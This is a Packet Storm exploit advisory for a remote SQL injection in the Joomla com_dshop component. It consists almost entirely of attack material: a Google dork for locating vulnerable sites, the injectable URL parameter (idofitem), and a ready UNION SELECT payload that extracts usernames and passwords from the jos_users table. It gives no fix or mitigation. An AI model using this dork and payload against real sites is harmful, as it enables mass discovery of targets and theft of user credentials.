The Joomla Dshop component suffers from a remote SQL injection vulnerability.
6a52e7d893c2665958898ad01d124ce3ebcaf1af7dd716c0efef90a5caeb521a
################################################################################################
# Exploit Title: Joomla Component (com_dshop) SQL Injection Vulnerability
#
# Author : CoBRa_21
#
# E-Mail : uyku_cu [at] windowslive.com
#
# Google Dork : inurl:com_dshop
#
# Status : High-Risk
#
# Script Page : null
#
################################################################################################
#
# SQL Vulnerability
#
# https://127.0.0.1/[PATH]/index.php?option=com_dshop&controller=fpage&task=flypage&idofitem=12 (SQL)
#
# SQL Exploit
#
# +union+select+0,1,2,group_concat(username,0x3a,password),4,5,6,7+from+jos_users
#
################################################################################################
# ( Vulnerability Researcher )
################################################################################################
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed